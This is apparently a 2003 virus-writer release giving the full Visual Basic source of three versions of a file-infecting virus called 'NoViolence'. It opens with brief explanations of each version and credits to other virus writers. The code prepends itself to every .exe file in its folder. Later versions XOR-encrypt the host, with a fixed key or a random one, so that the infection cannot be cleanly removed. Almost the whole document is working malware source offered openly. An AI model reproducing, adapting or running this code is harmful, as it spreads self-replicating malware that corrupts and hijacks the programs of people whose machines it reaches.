NoViolence 1.0 | 2.0 | 3.0 by Second Part To Hell www.spth.de.vu written in 2003 in Austria These are three different versions of a VisualBasic virus. I'll explain, what they do: -- NoViolence 1.0 This virus is a simple prepender, which copies the code of its victim to itself after the whole virus code, and after the execution of the virus-code the host code is executed as 'file.exe'. -- NoViolence 2.0 The second Version encryptes the host-code with a XOR encryption and the key 170. You can not just delete the virus from the file because the host file won't work anymore. -- NoViolence 3.0 The third version is an improved version of NoViolence 2.0. It encryptes the host file with a random key (0-255 | 0h-FFh), and it decryptes the file again via brute-force before it executes it. Big thanks goes to Vorgon/iKx for explaining me this technique of prepending a file. Another big thanks flies to Arzy for sending me his ideas and sources and explaining me some stuff while drinking beer... :) * * * * * * * * * * * NoViolence 1.0 * * * * * * * * * * * Sub form_load() Dim virusname, viruscont, virussize Dim victimname, victimcont Dim hostcont, allcont virusname = App.Path + "\" + App.EXEName + ".exe" virussize = 12288 Open virusname For Binary As #1 allcont = Input$(LOF(1), 1) Close #1 viruscont = Mid(allcont, 1, virussize) hostcont = Mid(allcont, virussize + 1) victimname = Dir(App.Path + "\*.exe") While (victimname <> "") If App.EXEName <> Mid(victimname, 1, Len(victimname) - 4) Then Open victimname For Binary As #1 victimcont = Input$(LOF(1), 1) Close #1 If Mid(victimcont, 77, 1) <> "S" Then Open victimname For Output As #1 Print #1, viruscont + victimcont Close #1 End If End If victimname = Dir() Wend If FileLen(virusname) <> virussize Then Open "file.exe" For Output As #1 Print #1, hostcont Close #1 Shell "file.exe" End If End End Sub * * * * * * * * * * * NoViolence 1.0 * * * * * * * * * * * * * * * * * * * * * * NoViolence 2.0 * * * * * * * * * * * Sub form_load() Dim virusname, viruscont, virussize Dim victimname, victimcont, victimconte Dim hostconte, hostcont, allcont Dim cryptkey virusname = App.Path + "\" + App.EXEName + ".exe" virussize = 13312 cryptkey = 170 Open virusname For Binary As #1 allcont = Input$(LOF(1), 1) Close #1 viruscont = Mid(allcont, 1, virussize) hostconte = Mid(allcont, virussize + 1) For i = 1 To Len(hostconte) hostcont = hostcont + Chr((Asc(Mid(hostconte, i, 1)) Xor cryptkey)) Next victimname = Dir(App.Path + "\*.exe") While (victimname <> "") victimconte = "" If App.EXEName <> Mid(victimname, 1, Len(victimname) - 4) Then Open victimname For Binary As #1 victimcont = Input$(LOF(1), 1) Close #1 For i = 1 To Len(victimcont) victimconte = victimconte + Chr((Asc(Mid(victimcont, i, 1)) Xor cryptkey)) Next If Mid(victimcont, 77, 1) <> "S" Then Open victimname For Output As #1 Print #1, viruscont + victimconte Close #1 End If End If victimname = Dir() Wend If FileLen(virusname) <> virussize Then Open "file.exe" For Output As #1 Print #1, hostcont Close #1 Shell "file.exe" End If End End Sub * * * * * * * * * * * NoViolence 2.0 * * * * * * * * * * * * * * * * * * * * * * NoViolence 3.0 * * * * * * * * * * * Sub form_load() Randomize Dim virusname, viruscont, virussize Dim victimname, victimcont, victimconte Dim hostconte, hostcont, allcont Dim encryptkey, decryptkey virusname = App.Path + "\" + App.EXEName + ".exe" virussize = 13312 encryptkey = Int(Rnd * 256) Open virusname For Binary As #1 allcont = Input$(LOF(1), 1) Close #1 viruscont = Mid(allcont, 1, virussize) hostconte = Mid(allcont, virussize + 1) If hostconte <> "" Then decryptkey = Asc(Mid(hostconte, 1, 1)) Xor 77 End If For i = 1 To Len(hostconte) hostcont = hostcont + Chr((Asc(Mid(hostconte, i, 1)) Xor decryptkey)) Next victimname = Dir(App.Path + "\*.exe") While (victimname <> "") victimconte = "" If App.EXEName <> Mid(victimname, 1, Len(victimname) - 4) Then Open victimname For Binary As #1 victimcont = Input$(LOF(1), 1) Close #1 For i = 1 To Len(victimcont) victimconte = victimconte + Chr((Asc(Mid(victimcont, i, 1)) Xor encryptkey)) Next If Mid(victimcont, 77, 1) <> "S" Then Open victimname For Output As #1 Print #1, viruscont + victimconte Close #1 End If End If victimname = Dir() Wend If FileLen(virusname) <> virussize Then Open "file.exe" For Output As #1 Print #1, hostcont Close #1 Shell "file.exe" End If End End Sub * * * * * * * * * * * NoViolence 3.0 * * * * * * * * * * *